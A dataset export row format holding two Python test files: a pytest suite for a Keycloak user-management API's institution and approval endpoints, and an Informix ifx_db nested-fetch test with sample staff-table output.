hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c53a3911006890d0ace0fdf41d902d54364292e2 | 23,412 | py | Python | tests/user_mgmt/test_api_insts.py | WIPACrepo/keycloak-rest-services | 2661b0db2dd320bdb8eefc62c805188bec52ecc7 | [
"MIT"
] | 1 | 2021-09-23T14:39:36.000Z | 2021-09-23T14:39:36.000Z | tests/user_mgmt/test_api_insts.py | WIPACrepo/keycloak-rest-services | 2661b0db2dd320bdb8eefc62c805188bec52ecc7 | [
"MIT"
] | 38 | 2020-08-31T22:53:09.000Z | 2022-03-28T20:55:39.000Z | tests/user_mgmt/test_api_insts.py | WIPACrepo/keycloak-rest-services | 2661b0db2dd320bdb8eefc62c805188bec52ecc7 | [
"MIT"
] | null | null | null | import asyncio
import pytest
from rest_tools.client import AsyncSession
import krs.users
import krs.groups
import krs.email
from ..util import keycloak_bootstrap
from .util import port, server, mongo_client, email_patch
@pytest.mark.asyncio
async def test_experiments_empty(server):
rest, krs_client, *_ = server
client = await rest('test')
ret = await client.request('GET', '/api/experiments')
assert ret == []
@pytest.mark.asyncio
async def test_experiments(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments')
assert ret == ['IceCube']
@pytest.mark.asyncio
async def test_institutions_empty(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments/IceCube/institutions')
assert ret == []
@pytest.mark.asyncio
async def test_institutions(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments/IceCube/institutions')
assert ret == ['UW-Madison']
@pytest.mark.asyncio
async def test_institution_subgroups_empty(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison')
assert ret == {'subgroups':[]}
@pytest.mark.asyncio
async def test_institution_subgroups(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison')
assert ret == {'subgroups':['authorlist']}
@pytest.mark.asyncio
async def test_all_experiments(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-RF', rest_client=krs_client)
await krs.groups.create_group('/institutions/Gen2', rest_client=krs_client)
await krs.groups.create_group('/institutions/Gen2/UW-RF', rest_client=krs_client)
await krs.groups.create_group('/institutions/Gen2/UW-RF/authorlist', rest_client=krs_client)
ret = await client.request('GET', '/api/all-experiments')
expected = {
'IceCube': {
'UW-Madison': {'subgroups':['authorlist']},
'UW-RF': {'subgroups':[]},
},
'Gen2': {
'UW-RF': {'subgroups':['authorlist']},
},
}
assert ret == expected
@pytest.mark.asyncio
async def test_institution_users(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
with pytest.raises(Exception):
await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': [], 'authorlist': []}
@pytest.mark.asyncio
async def test_institution_users_superadmin(server):
rest, krs_client, *_ = server
client = await rest('test', groups=['/admin'])
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-RiverFalls', rest_client=krs_client)
ret = await client.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': [], 'authorlist': []}
@pytest.mark.asyncio
async def test_institution_adduser(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': [], 'authorlist': []}
await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test')
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': ['test'], 'authorlist': []}
await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test', {'authorlist': True})
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': ['test'], 'authorlist': ['test']}
@pytest.mark.asyncio
async def test_institution_removeuser(server):
rest, krs_client, *_ = server
client = await rest('test')
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison/authorlist', rest_client=krs_client)
await krs.groups.add_user_group('/institutions/IceCube/UW-Madison', 'test', rest_client=krs_client)
await krs.groups.add_user_group('/institutions/IceCube/UW-Madison/authorlist', 'test', rest_client=krs_client)
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': ['test'], 'authorlist': ['test']}
await client2.request('PUT', '/api/experiments/IceCube/institutions/UW-Madison/users/test', {'authorlist': False})
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': ['test'], 'authorlist': []}
await krs.groups.add_user_group('/institutions/IceCube/UW-Madison/authorlist', 'test', rest_client=krs_client)
await client2.request('DELETE', '/api/experiments/IceCube/institutions/UW-Madison/users/test')
ret = await client2.request('GET', '/api/experiments/IceCube/institutions/UW-Madison/users')
assert ret == {'users': [], 'authorlist': []}
@pytest.mark.asyncio
async def test_inst_approvals_register(server, mongo_client, email_patch):
_, krs_client, address, *_ = server
session = AsyncSession(retries=0)
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
with pytest.raises(Exception):
r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals'))
r.raise_for_status()
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
'first_name': 'First',
'last_name': 'Last',
'email': 'test@test',
}
r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
r.raise_for_status()
ret = r.json()
approval_id = ret['id']
email_patch.assert_not_called()
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 1
assert ret[0]['first_name'] == data['first_name']
assert ret[0]['username'] == 'flast'
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
@pytest.mark.asyncio
async def test_inst_approvals_register_with_admins(server, mongo_client, email_patch):
rest, krs_client, address, *_ = server
session = AsyncSession(retries=0)
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
'first_name': 'First',
'last_name': 'Last',
'email': 'test@test',
}
r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
r.raise_for_status()
ret = r.json()
approval_id = ret['id']
email_patch.assert_called()
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 1
assert ret[0]['first_name'] == data['first_name']
assert ret[0]['username'] == 'flast'
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
@pytest.mark.asyncio
async def test_inst_approvals_second(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test')
with pytest.raises(Exception):
await client.request('POST', '/api/inst_approvals')
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_not_called()
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 0
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
assert ret[0]['username'] == 'test'
@pytest.mark.asyncio
async def test_inst_approvals_second_with_admin(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
client2 = await rest('test3', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
assert email_patch.call_count == 2
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 0
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
assert ret[0]['username'] == 'test'
@pytest.mark.asyncio
async def test_inst_approvals_move(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/OldInst', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test', groups=['/institutions/IceCube/OldInst'])
with pytest.raises(Exception):
await client.request('POST', '/api/inst_approvals')
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
'remove_institution': 'OldInst',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_not_called()
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 0
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
assert ret[0]['remove_institution'] == data['remove_institution']
assert ret[0]['username'] == 'test'
@pytest.mark.asyncio
async def test_inst_approvals_move_with_admin(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/OldInst', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test', groups=['/institutions/IceCube/OldInst'])
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
with pytest.raises(Exception):
await client.request('POST', '/api/inst_approvals')
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
'remove_institution': 'OldInst',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_called()
ret = await mongo_client.user_registrations.find().to_list(10)
assert len(ret) == 0
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
assert ret[0]['remove_institution'] == data['remove_institution']
assert ret[0]['username'] == 'test'
@pytest.mark.asyncio
async def test_inst_approvals_get(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_called()
# no auth
with pytest.raises(Exception):
await client.request('GET', '/api/inst_approvals')
# success
ret = await client2.request('GET', '/api/inst_approvals')
assert len(ret) == 1
assert ret[0]['id'] == approval_id
assert ret[0]['experiment'] == data['experiment']
assert ret[0]['institution'] == data['institution']
assert ret[0]['username'] == 'test'
@pytest.mark.asyncio
async def test_inst_approvals_actions_approve(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_called()
email_patch.reset_mock()
# no auth
with pytest.raises(Exception):
await client.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
email_patch.assert_not_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'test' not in ret
# success
await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 0
email_patch.assert_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'test' in ret
@pytest.mark.asyncio
async def test_inst_approvals_actions_approve_gen2(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube-Gen2', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube-Gen2/UW-Madison', rest_client=krs_client)
client = await rest('test')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_called()
email_patch.reset_mock()
await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 0
email_patch.assert_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'test' in ret
ret = await krs.groups.get_group_membership('/institutions/IceCube-Gen2/UW-Madison', rest_client=krs_client)
assert 'test' in ret
@pytest.mark.asyncio
async def test_inst_approvals_actions_approve_posix(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
await krs.groups.create_group('/posix', rest_client=krs_client)
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
'first_name': 'first',
'last_name': 'last',
'email': 'test@test',
}
_, krs_client, address, *_ = server
session = AsyncSession(retries=0)
r = await asyncio.wrap_future(session.post(address+'/api/inst_approvals', json=data))
r.raise_for_status()
ret = r.json()
approval_id = ret['id']
email_patch.assert_called()
email_patch.reset_mock()
await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/approve')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 0
email_patch.assert_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'flast' in ret
ret = await krs.groups.get_group_membership('/posix', rest_client=krs_client)
assert 'flast' in ret
@pytest.mark.asyncio
async def test_inst_approvals_actions_deny(server, mongo_client, email_patch):
rest, krs_client, *_ = server
await krs.groups.create_group('/institutions', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube', rest_client=krs_client)
await krs.groups.create_group('/institutions/IceCube/UW-Madison', rest_client=krs_client)
client = await rest('test')
client2 = await rest('test2', groups=['/institutions/IceCube/UW-Madison/_admin'])
data = {
'experiment': 'IceCube',
'institution': 'UW-Madison',
}
ret = await client.request('POST', '/api/inst_approvals', data)
approval_id = ret['id']
email_patch.assert_called()
email_patch.reset_mock()
# no auth
with pytest.raises(Exception):
await client.request('POST', f'/api/inst_approvals/{approval_id}/actions/deny')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 1
assert ret[0]['id'] == approval_id
email_patch.assert_not_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'test' not in ret
# success
await client2.request('POST', f'/api/inst_approvals/{approval_id}/actions/deny')
ret = await mongo_client.inst_approvals.find().to_list(10)
assert len(ret) == 0
email_patch.assert_called()
ret = await krs.groups.get_group_membership('/institutions/IceCube/UW-Madison', rest_client=krs_client)
assert 'test' not in ret
| 39.480607 | 118 | 0.707201 | 2,990 | 23,412 | 5.334783 | 0.038127 | 0.062629 | 0.077237 | 0.104821 | 0.971601 | 0.965582 | 0.963262 | 0.952479 | 0.930788 | 0.910789 | 0 | 0.007065 | 0.147574 | 23,412 | 592 | 119 | 39.547297 | 0.792203 | 0.002008 | 0 | 0.808989 | 0 | 0 | 0.257642 | 0.154208 | 0 | 0 | 0 | 0 | 0.208989 | 1 | 0 | false | 0 | 0.017978 | 0 | 0.017978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3d706cbd9103fec4a8bed5037e1d0a77e634a7b0 | 16,676 | py | Python | ifx_db/tests/test_038_FetchRowIndexPosNested_01.py | ifxdb/PythonIfxDB | a9c64e8ade1329b7102f0bf356c0e4b6d230ca95 | [
"Apache-2.0"
] | 3 | 2017-05-01T10:22:27.000Z | 2021-12-29T11:02:34.000Z | ifx_db/tests/test_038_FetchRowIndexPosNested_01.py | ifxdb/PythonIfxDB | a9c64e8ade1329b7102f0bf356c0e4b6d230ca95 | [
"Apache-2.0"
] | 1 | 2020-01-07T12:56:26.000Z | 2020-01-07T12:56:26.000Z | ifx_db/tests/test_038_FetchRowIndexPosNested_01.py | ifxdb/PythonIfxDB | a9c64e8ade1329b7102f0bf356c0e4b6d230ca95 | [
"Apache-2.0"
] | 3 | 2017-05-10T16:03:25.000Z | 2018-03-19T14:59:41.000Z | #
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2007-2008
#
import unittest, sys
import ifx_db
import config
from testfunctions import IfxDbTestFunctions
class IfxDbTestCase(unittest.TestCase):
def test_038_FetchRowIndexPosNested_01(self):
obj = IfxDbTestFunctions()
obj.assert_expect(self.run_test_038)
def run_test_038(self):
conn = ifx_db.connect(config.ConnStr, config.user, config.password)
serverinfo = ifx_db.server_info( conn )
if (serverinfo.DBMS_NAME[0:3] != 'Inf'):
result = ifx_db.exec_immediate(conn, "SELECT * FROM staff WHERE id < 101", {ifx_db.SQL_ATTR_CURSOR_TYPE: ifx_db.SQL_CURSOR_KEYSET_DRIVEN})
else:
result = ifx_db.exec_immediate(conn, "SELECT * FROM staff WHERE id < 101")
row = ifx_db.fetch_row(result)
while ( row ):
if (serverinfo.DBMS_NAME[0:3] != 'Inf'):
result2 = ifx_db.prepare(conn, "SELECT * FROM staff WHERE id < 101", {ifx_db.SQL_ATTR_CURSOR_TYPE: ifx_db.SQL_CURSOR_KEYSET_DRIVEN})
else:
result2 = ifx_db.prepare(conn, "SELECT * FROM staff WHERE id < 101")
ifx_db.execute(result2)
row2 = ifx_db.fetch_row(result2)
while ( row2 ):
print "%s : %s : %s : %s : %s\n" % (ifx_db.result(result2, 0), \
ifx_db.result(result2, 1), \
ifx_db.result(result2, 2), \
ifx_db.result(result2, 3), \
ifx_db.result(result2, 5))
row2 = ifx_db.fetch_row(result2)
row = ifx_db.fetch_row(result)
#__END__
#__LUW_EXPECTED__
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
#100 : Plotz : 42 : Mgr : 18352.80
#10 : Sanders : 20 : Mgr : 18357.50
#20 : Pernal : 20 : Sales : 18171.25
#30 : Marenghi : 38 : Mgr : 17506.75
#40 : OBrien : 38 : Sales : 18006.00
#50 : Hanes : 15 : Mgr : 20659.80
#60 : Quigley : 38 : Sales : 16808.30
#70 : Rothman : 15 : Sales : 16502.83
#80 : James : 20 : Clerk : 13504.60
#90 : Koonitz : 42 : Sales : 18001.75
